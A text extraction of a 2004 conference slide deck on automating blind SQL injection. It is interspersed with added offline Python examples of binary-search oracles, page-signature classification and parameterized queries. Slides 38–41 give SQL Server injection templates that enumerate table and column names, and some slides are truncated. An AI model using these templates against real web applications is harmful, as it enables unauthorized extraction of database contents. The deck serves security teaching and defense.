Blind SQL Injection Automation Techniques by Cameron Hotchkies.pdf

Upload: habibo123

Post on 02-Jun-2018


  • 8/11/2019 Blind SQL injection autmation Tecniques by Cameroin Hotchkies.pdf

1/48

    Blind SQL Injection Automation Techniques

    Black Hat Briefings USA 2004

    Cameron Hotchkies, [email protected]

    2/48

    What is SQL Injection?

    • Client supplied data passed to an application without appropriate data validation

    • Processed as commands by the database

    3/48

    Frequently Used To

    • Perform operations on the database

    • Bypass authentication mechanisms

    • Read otherwise unavailable information from the database

    • Write information such as new user accounts to the database

    4/48

    Three Forms of SQL Injection

    • There are three main forms of SQL Injection used to read information from a database:

      - Redirection and reshaping a query

      - Error message based

      - Blind Injection

    5/48

    Blind SQL Injection

    • Blind SQL Injection techniques can include forming queries resulting in boolean values and interpreting the output HTML pages

    • SQL Injection can result in significant data leakage and/or data modification attacks

    • Blind attacks are essentially playing 20 questions with the web server

    6/48

    Why focus on Blind Injections?

    • Blind injections are as common as any other injection

    • Blind holes involve a false sense of security on the host

    • Requires a larger investment of time to execute manual penetration against

    7/48

    Benefits of an Automated Tool

    • We can ask the server as many yes/no questions as we want

    • Finding the first letter of a username with a binary search takes 7 requests

    • Finding the full username if it's 8 characters takes 56 requests

    • To find the username is 8 characters takes 6 requests

    • 62 requests just to find the username

    • This adds up

    8/48

    Benefits Cont'd

    • Assuming it takes

    9/48

    Benefits Cont'd

    • If you want non-trivial penetration:

      - Table names

      - Column names

      - Actual Data

    • This would take hours or days or longer depending on the size of the database

    10/48

    Sound Simple?

    An effective tool is more complex than a few shell scripts and netcat

    11/48 to 13/48: image-only slides (no text in the extraction)

    14/48

    Searching for Integers

    • Select a range, usually starting with 0

    • Increase value exponentially by a factor of two until upper limit is discovered

    • Partition halfway between upper limit and previous value

    • Continue to halve sections until one value remains
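The search procedure on this slide, together with the per-letter binary search and the request counts quoted on slide 7, as an added example that is not part of the talk or of the SQueaL tool. A local stand-in oracle (`CountingOracle`, a constructed class) answers the one yes/no question the slide assumes, "is the hidden value greater than n?", so the arithmetic (7 questions per letter, 6 for the length of an 8-character name, 62 in total) can be checked offline; all function names are mine.

```python
# Added example (not from the talk): the integer search from slide 14 and the
# per-character binary search from slide 7, driven by a local stand-in oracle
# so that it runs offline.


class CountingOracle:
    """Answers `hidden > n` and counts how many questions were asked."""

    def __init__(self, hidden):
        self._hidden = hidden
        self.questions = 0

    def greater_than(self, n):
        self.questions += 1
        return self._hidden > n


def find_integer(oracle, start=0):
    """Locate a non-negative integer with greater-than questions only.

    Phase 1 doubles an upper limit until the hidden value no longer exceeds it.
    Phase 2 partitions halfway between that limit and the previous value and
    keeps halving until a single value remains.
    """
    low = start - 1            # invariant: hidden > low
    high = max(start, 1)       # candidate upper limit
    while oracle.greater_than(high):
        low, high = high, high * 2
    # Now low < hidden <= high; bisect the interval (low, high].
    while high - low > 1:
        mid = (low + high) // 2
        if oracle.greater_than(mid):
            low = mid
        else:
            high = mid
    return high


def find_ascii_char(oracle):
    """Binary search over the 7-bit ASCII range 0..127: always exactly
    7 questions, the "7 requests" per letter quoted on slide 7."""
    low, high = 0, 128         # hidden value lies in [low, high)
    while high - low > 1:
        mid = (low + high) // 2
        if oracle.greater_than(mid - 1):   # hidden >= mid ?
            low = mid
        else:
            high = mid
    return chr(low)


def recover_string(secret):
    """Simulate recovering a whole string the way the slide's budget is
    computed: find its length first, then each character in turn.
    Returns (recovered_string, total_questions)."""
    length_oracle = CountingOracle(len(secret))
    length = find_integer(length_oracle)
    total = length_oracle.questions
    recovered = []
    for position in range(length):
        oracle = CountingOracle(ord(secret[position]))   # stand-in for the server
        recovered.append(find_ascii_char(oracle))
        total += oracle.questions
    return "".join(recovered), total


if __name__ == "__main__":
    # 8-character name: 6 questions for the length + 8 * 7 for the letters = 62
    print(recover_string("username"))
```

The same arithmetic is what makes this activity visible on the defending side: recovering a single 8-character value costs 62 near-identical requests that differ only in a comparison value, a pattern that stands out in access logs and in rate or similarity based request monitoring.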

    15/48

    Problem

    • How do we recognize true vs false pages from the web server?

      - We take pattern recognition for granted

      - Can't we just do a string compare?

    • The whole point of a web application is to have dynamic content

      - It's entirely likely that the section indicating the true/false is not the only dynamic content

      - String comparison is suitable for error based injection but not blind injection

    16/48: image-only slide (no text in the extraction)

    17/48

    Solution One: Keyword Search

    • Requires direct intervention of the user

    • User interaction requires effort to be expended, which is what we are trying to minimize

    18/48

    Solution Two: MD5 Sum

    • Web Applications are designed to be dynamic

    • MD5 causes large output changes from small input changes

    19/48

    Google vs. Hoogle

    20/48

    MD5 Sum Comparison

    • MD5 does not handle changes well

    • May work on some web applications but not comprehensive

    21/48

    Solution Three: Text Difference Engine

    • Text difference tools are designed to highlight informational changes that we are not concerned with.

    • A lot of effort is wasted to retain information that will simply be discarded.

    22/48

    Solution Four: Parse HTML Tree

    • Represent text as html entities in a tree data structure

    • Look for differences in the shape of the trees

    • If only non-markup data is changing there will be no way to proceed in automation

    • Easier to implement an xhtml parser than a realistic html parser

    23/48

    Solution Five: Linear Representation of ASCII Sums

    • small input variation = small output variation

    24/48

    Signature Comparison

    • Generating base cases

      - Will need base cases for comparison of unknowns

      - We already know guaranteed true/false pages

      - We have multiple options for known base cases

    • Easiest is

    25/48

    Sample Signature Set (diagram)

    26/48

    Realistic Signature Set (diagram)

    27/48

    Tolerance Band Comparison

    • Minor changes in textual content result in small overall changes in sum

    • Changes still occur

    • Allowing for tolerance instead of exact comparison in sums lessens false negatives

      |known - unknown| / known

    28/48

    Tolerance Band Comparison (diagram)

    29/48

    Shortcomings of Tolerance Band Comparison

    • It works, but there are a lot of unnecessary comparisons

    • Doesn't take advantage of known garbage data

    30/48

    Subtractive Filter

    • We can identify sums that are equal between conflicting base cases

    31/48

    Subtractive Filter

    • This can be combined with the tolerance band to eliminate unnecessary comparisons

    32/48

    Adaptive Filter

    • Allows the application to be profiled before testing against unknowns

    • Removes junk data that could skew results

    • Requires multiple base cases

    33/48

    Two "Identical" Samples (diagram)

    34/48

    Adaptive Filter Applied (diagram)

    35/48

    Benefits of Adaptive Filter

    • Tolerance is mostly unnecessary at this point

    • Removes most dynamic content unrelated to the data leakage

    36/48

    SQueaL

    • SQueaL was created alongside the research being presented

    • Written in C# for Windows & Linux

      - Both Windows.Forms & Gtk-Sharp GUIs available

    • Free for non-commercial use

      - Black Hat Conference CDs include a commercially licensed version (free for you)

    • Exports data to an XML format for nice presentation to clients/PHBs

    37/48

    SQueaL Exporting Data

    • SQueaL uses its own XML format for saving exploit data

    38/48

    Gathering Table Info

    We start with the ID number for each table:

        ... AND (SELECT COUNT(name) FROM sysobjects WHERE xtype=char(85)) > search_value

        ... AND (SELECT MIN(id) FROM sysobjects WHERE id > prev_table_id AND xtype=char(85)) > search_value

    (char(85) is 'U', the sysobjects xtype of user tables; search_value and prev_table_id are the values the tool substitutes on each request.)

    39/48

    More Table Info

    We can now retrieve each table's recognizable name:

        ... AND (SELECT TOP 1 LEN(name) FROM sysobjects WHERE id=table_id AND xtype=char(85)) > search_value

        ... AND (SELECT ASCII(SUBSTRING(name, character_counter, 1)) FROM sysobjects WHERE id=table_id) > search_value

    40/48

    Gathering Field Information

    Once we have the table information we can move on to the fields:

        ... AND (SELECT COUNT(name) FROM syscolumns WHERE id=table_id) > search_value

        ... AND (SELECT MIN(colid) FROM syscolumns WHERE colid > prev_colid AND id=table_id) > search_value

    41/48

    Field Info Cont'd

        ... AND (SELECT TOP 1 LEN(name) FROM syscolumns WHERE id=table_id AND colid=colid) > search_value

        ... AND (SELECT ASCII(SUBSTRING(name, character_counter, 1)) FROM syscolumns WHERE id=table_id AND colid=colid) > search_value

        ... AND (SELECT TOP 1 xtype FROM syscolumns WHERE id=table_id AND colid=colid) > search_value

    42/48

    Field Data Types

    • Gathering field data types is faster but requires knowledge of the type mapping (char, varchar, ...)

    • Doesn't "lower the bar" for finding exploits

    • Troubles with no carriage returns / auto generated HTML

    45/48

    Forced CRLF

    • What happens when HTML is generated without carriage returns?

      - Natural tendency to force carriage returns

      - This will throw off the data

    • At this point an HTML parser would be needed
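The page-recognition scheme of slides 18 to 35 (MD5 sum, linear ASCII-sum signatures, the tolerance band |known - unknown| / known, the subtractive filter and the adaptive filter) together with the forced-CRLF caveat of this slide, as one added example that is neither from the talk nor from SQueaL. The four base-case pages are constructed, every function name is mine, and the scheme assumes all base cases have the same number of lines; a response with no line breaks is rejected rather than re-wrapped, since the slide explains that forcing carriage returns throws the data off.

```python
import hashlib

# Constructed sample responses (not from the talk): two guaranteed-true and two
# guaranteed-false base cases. Each carries a per-request comment line that has
# nothing to do with the injected condition: the "junk" the adaptive filter removes.
def make_page(request_id, *body_lines):
    """Build one constructed response: static frame, a dynamic comment, the body."""
    return "\n".join(("<html><body>", "<h1>Order portal</h1>",
                      f"<!-- request {request_id} -->", *body_lines, "</body></html>"))

TRUE_PAGES = [make_page(1001, "<p>Welcome back, alice</p>", "<div>Rows shown: 3</div>"),
              make_page(1002, "<p>Welcome back, alice</p>", "<div>Rows shown: 3</div>")]
FALSE_PAGES = [make_page(1003, "<p>No results found</p>", '<div class="empty">No rows</div>'),
               make_page(1004, "<p>No results found</p>", '<div class="empty">No rows</div>')]


def md5_hex(page):
    """Solution two: a whole-page digest. Any dynamic byte changes the whole value."""
    return hashlib.md5(page.encode("utf-8")).hexdigest()


def linear_signature(page):
    """Solution five: one ASCII sum per line, so a small textual change moves
    one number by a small amount instead of scrambling a digest."""
    return [sum(ord(c) for c in line) for line in page.split("\n")]


def signature_usable(pages):
    """Forced-CRLF check: a response with no line breaks collapses to one sum."""
    return all("\n" in page for page in pages)


def within_tolerance(known, unknown, tolerance):
    """Tolerance band from slide 27: |known - unknown| / known <= tolerance.
    An empty known line (sum 0) only matches an empty unknown line."""
    if known == 0:
        return unknown == 0
    return abs(known - unknown) / known <= tolerance


def subtractive_mask(true_sig, false_sig):
    """Subtractive filter: a line whose sum is equal in the two conflicting
    base cases can never separate true from false, so it is dropped."""
    return [a != b for a, b in zip(true_sig, false_sig)]


def adaptive_mask(signatures):
    """Adaptive filter: profile several samples of the same class and drop
    lines whose sums vary between them (request ids, timestamps, ads)."""
    return [len(set(column)) == 1 for column in zip(*signatures)]


def build_profile(true_pages, false_pages):
    """Combine both filters into one keep-mask plus reference signatures."""
    if not signature_usable(true_pages + false_pages):
        raise ValueError("responses contain no line breaks; an HTML parser would be needed")
    t_sigs = [linear_signature(p) for p in true_pages]
    f_sigs = [linear_signature(p) for p in false_pages]
    if len({len(s) for s in t_sigs + f_sigs}) != 1:
        raise ValueError("base cases differ in line count; line signatures are not usable")
    stable = [a and b for a, b in zip(adaptive_mask(t_sigs), adaptive_mask(f_sigs))]
    informative = subtractive_mask(t_sigs[0], f_sigs[0])
    return {"true": t_sigs[0], "false": f_sigs[0],
            "keep": [s and i for s, i in zip(stable, informative)]}


def classify(page, profile, tolerance=0.0):
    """Compare only the kept lines of an unknown page against both base cases;
    answer 'true', 'false', or 'unknown' when neither (or both) match."""
    sig = linear_signature(page)
    if len(sig) != len(profile["keep"]):
        return "unknown"

    def matches(reference):
        return all(within_tolerance(k, u, tolerance)
                   for k, u, keep in zip(reference, sig, profile["keep"]) if keep)

    is_true, is_false = matches(profile["true"]), matches(profile["false"])
    if is_true != is_false:
        return "true" if is_true else "false"
    return "unknown"


if __name__ == "__main__":
    profile = build_profile(TRUE_PAGES, FALSE_PAGES)
    print("kept lines:", profile["keep"])
    print(classify(make_page(2001, "<p>Welcome back, alice</p>", "<div>Rows shown: 3</div>"), profile))
```

With the constructed pages the keep-mask retains only the two body lines: the frame lines are dropped by the subtractive filter (equal in both classes) and the request-id comment by the adaptive filter (varies between "identical" samples), so the two true base cases get different MD5 digests but identical filtered signatures. A small edit to a kept line ("alice!" instead of "alice") is rejected at tolerance 0 and accepted at 5 %, which is the trade-off slide 29 describes.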

    46/48

    Conclusion

    • Same techniques can be utilized with queries indicating invalid SQL

      - Treat these as questions such as "Is this syntax valid?", which is now a yes/no question

      - MD5: bad for these purposes

    • Same techniques can be utilized in other applications to interpret results from HTML responses

      - XPath Injection

      - LDAP Injection

    • Use parameterized code in an appropriate fashion to call stored procedures
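The closing recommendation, parameterized code, as an added example that is not from the talk. It uses Python's sqlite3 module with a constructed in-memory table; SQLite has no stored procedures, so the example shows the bound-parameter half of the advice, which applies unchanged to calling a stored procedure with bound parameters on SQL Server. The string-concatenating lookup is the pattern the whole talk depends on, shown beside the fix; the tautology input is a test value only.

```python
import sqlite3


def make_db():
    """Constructed in-memory table (not the talk's data) with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)",
                     [("alice", "alice@example.invalid"), ("bob", "bob@example.invalid")])
    return conn


def lookup_concatenated(conn, name):
    """The pattern the talk exploits: user data is spliced into the SQL text,
    so quotes and operators inside it are parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_parameterized(conn, name):
    """The closing slide's fix: the value is bound as a parameter and is never
    parsed as SQL, whatever characters it contains."""
    return sorted(row[0] for row in
                  conn.execute("SELECT name FROM users WHERE name = ?", (name,)))


if __name__ == "__main__":
    conn = make_db()
    probe = "x' OR '1'='1"     # classic tautology, used here only as test input
    print(lookup_concatenated(conn, "alice"), lookup_concatenated(conn, probe))
    print(lookup_parameterized(conn, "alice"), lookup_parameterized(conn, probe))
```

The concatenated version returns every row for the tautology because the quote in the input ends the string literal and the rest becomes SQL; the parameterized version returns nothing because the driver hands the entire input to the engine as one value, so there is no boolean condition for a yes/no oracle to answer.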

    47/48

    References & Suggested Papers

    • Advanced SQL Injection in SQL Server Applications
      - Chris Anley, NGS Systems, http://www.nextgenss.com/papers/advanced_sql_injection.pdf

    • (more) Advanced SQL Injection
      - Chris Anley, NGS Systems, http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf

    • Blind SQL Injection: Are your web-apps Vulnerable?
      - Kevin Spett, SPI Dynamics, http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

    48/48

    Questions & Answers

    This and other tools are available for download at

    http://[email protected]#g/#eleases/